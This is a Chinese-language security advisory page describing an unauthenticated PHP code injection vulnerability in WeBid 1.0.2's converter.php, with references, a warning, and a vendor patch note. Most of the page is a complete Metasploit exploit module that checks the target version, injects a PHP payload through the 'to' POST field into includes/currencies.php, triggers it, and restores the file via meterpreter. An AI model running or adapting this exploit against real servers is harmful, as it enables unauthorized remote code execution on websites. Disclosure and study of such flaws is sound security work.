安全研究
安全漏洞
WeBid converter.php远程PHP代码注入漏洞
发布日期:2012-05-27
更新日期:2012-06-27
受影响系统:
WeBid WeBid 1.x描述:
WeBid是开源拍卖脚本软件包。
WeBid在实现上存在SQL注入攻击漏洞,通过特制的converter.php文件,恶意用户可利用此漏洞在includes/currencies.php脚本内注入PHP代码,而无需任何身份验证,然后执行这些代码。
<*来源:Jacques Louw
链接:http://osvdb.org/show/osvdb/73609
http://secunia.com/advisories/45058/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'WeBid converter.php Remote PHP Code Injection',
'Description' => %q{
This module exploits a vulnerability found in WeBid version 1.0.2.
By abusing the converter.php file, a malicious user can inject PHP code
in the includes/currencies.php script without any authentication, which
results in arbitrary code execution.
},
'Author' => [
'EgiX', # Vulnerability Discovery, PoC
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '73609' ],
[ 'EDB', '17487' ]
],
'Version' => '$Revision: $',
'Privileged' => false,
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Payload' =>
{
},
'DisclosureDate' => 'Jul 05 2011',
'Targets' =>
[
[ 'WeBid 1.0.2 / Ubuntu', {} ]
],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to WeBid', '/WeBid'])
], self.class
)
end
def check
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
res = send_request_cgi({
'method' => 'GET',
'uri' => uri + "docs/changes.txt"
})
if res and res.code == 200 and res.body =~ /1\.0\.2 \- 17\/01\/11/
return Exploit::CheckCode::Appears
end
res = send_request_cgi({
'method' => 'GET',
'uri' => uri + "converter.php"
})
if res and res.code == 200 and res.body =~ /WeBId.*CURRENCY CONVERTER/
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def on_new_session(client)
if client.type != "meterpreter"
print_error("NOTE: you must use a meterpreter payload in order to automatically cleanup.")
print_error("The currencies.php won't be restored automatically.")
return
end
# stdapi must be loaded before we can use fs.file
client.core.use("stdapi") if not client.ext.aliases.include?("stdapi")
# Original currencies.php file
currencies_php = <<-eof
<?php
$conversionarray[] = '1265375103';
$conversionarray[] = array(
array('from' => 'GBP', 'to' => 'AED', 'rate' => '')
);
?>
eof
currencies_php = currencies_php.gsub(/^\t\t\t/, '')
pwd = client.fs.dir.pwd
print_status("Searching currencies.php file from #{pwd}")
res = client.fs.file.search(nil, "currencies.php", true, -1)
res.each do |hit|
filename = "#{hit['path']}/#{hit['name']}"
print_status("Restoring #{filename}")
client.fs.file.rm(filename)
fd = client.fs.file.new(filename, "wb")
fd.write(currencies_php)
fd.close
end
print_status("Cleanup finished")
end
def exploit
uri = target_uri.path
uri << '/' if uri[-1,1] != '/'
peer = "#{rhost}:#{rport}"
stub = "\0'));#{payload.encoded}?>"
print_status("#{peer} - Injecting the PHP payload")
response = send_request_cgi({
'uri' => uri + "converter.php",
'method' => "POST",
'vars_post' => {
"action" => "convert",
"from" => "USD",
"to" => stub
}
})
if response and response.code != 200
print_error("Server returned non-200 status code (#{response.code})")
return
end
print_status("#{peer} - Executing the PHP payload")
timeout = 0.01
response = send_request_cgi({
'uri' => uri + "includes/currencies.php",
'method' => "GET",
'headers' => {
'Connection' => "close",
}
}, timeout)
if response and response.code != 200
print_error("Server returned non-200 status code (#{response.code})")
end
handler
end
end
建议:
厂商补丁:
WeBid
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.webidsupport.com/forums/content.php?8-about
浏览次数:3334
严重程度:0(网友投票)
绿盟科技给您安全的保障